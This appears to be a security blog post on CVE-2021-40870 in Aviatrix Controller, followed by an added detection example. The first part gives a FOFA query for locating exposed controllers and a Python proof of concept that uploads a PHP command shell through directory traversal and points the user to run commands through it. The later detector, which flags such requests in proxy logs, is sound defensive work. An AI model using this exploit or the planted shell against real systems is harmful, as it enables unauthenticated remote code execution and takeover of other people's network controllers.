New vulnerability! CVE-2021-40870 Aviatrix-Controller remote code execution (getshell)

FOFA query: app="Aviatrix-Controller"
CVE-2021-40870 exploitation

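An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.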

POC

def poc_attack(url):
    try:
        url = url + "/"

        filename = "RCE.php"
        shell = '''cmd'])){ echo "
"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "
"; die; }?>'''
        if url.startswith('https://'):
            k = url.replace("https://", "")
            if k.endswith("/"):
                p = k.replace("/", "")
        user = '''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'''
        headers = {
            "Host": p,
            "User-Agent": user,
            "Connection": "close",
            "Content-Length": "109",
            "Content-Type": "application/x-www-form-urlencoded",
            "Accept-Encoding": "gzip",
        }
        body = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{filename}&data=poc by agun{shell}'
        r = requests.post(url + '/v1/backend1', headers=headers, data=body, verify=False)
        check_file = requests.get(url + '/v1/' + filename, verify=False)
        if check_file.status_code == 200:
            print(f'EXPLOITED {url}')
            print('')
            print(f'Go To {url}/v1/{filename}')
            print('')
            print('access shell using RCE.php?cmd=[command]')
    except Exception as err:
        pass

Original PoC published on GitHub: https://github.com/0xAgun/CVE-2021-40870
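
A detection-side counterpart to the PoC above, added here as an example and not part of the original post or the PoC repository: it flags logged requests that match the PoC's shape (a POST to /v1/backend1 with action=set_metric_gw_selections and an account_name carrying traversal or a script extension). The (method, target, body) record format, the function names and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Endpoint and action are taken from the PoC on this page; the (method, target,
# body) record format is an assumption about what a proxy or WAF log provides.
ENDPOINT = "/v1/backend1"
ACTION = "set_metric_gw_selections"
SCRIPT_EXT = (".php", ".phtml", ".phar")

def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding such as %252e%252e."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_request(method, target, body):
    """Return a reason string if the request matches the upload pattern, else None."""
    # The PoC sends "//v1/backend1", so collapse repeated slashes before comparing.
    path = re.sub(r"/+", "/", fully_unquote(target.split("?", 1)[0]))
    if method.upper() != "POST" or path != ENDPOINT:
        return None
    fields = parse_qs(body, keep_blank_values=True)
    if ACTION not in fields.get("action", []):
        return None
    for raw in fields.get("account_name", []):
        name = fully_unquote(raw).replace("\\", "/")
        if name.startswith("/") or ".." in name.split("/"):
            return f"traversal in account_name: {name}"
        if name.lower().endswith(SCRIPT_EXT):
            return f"script extension in account_name: {name}"
    return None

# Constructed sample records (not real traffic); "other_action" is a placeholder.
SAMPLES = [
    ("POST", "//v1/backend1", "CID=x&action=set_metric_gw_selections"
     "&account_name=/../../../var/www/php/RCE.php&data=x"),
    ("POST", "/v1/backend1", "CID=x&action=set_metric_gw_selections"
     "&account_name=%252e%252e%252fvar%252fwww%252fphp%252fa.php&data=x"),
    ("POST", "/v1/backend1", "CID=x&action=set_metric_gw_selections"
     "&account_name=prod-account&data=x"),
    ("POST", "/v1/backend1", "CID=x&action=other_action&account_name=../x"),
]

def scan(records):
    """Return (index, reason) for every record that matches."""
    return [(i, why) for i, rec in enumerate(records) if (why := check_request(*rec))]
```

Web server access logs usually omit POST bodies, so this check needs a source that records them, such as a reverse proxy or WAF in front of the controller.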
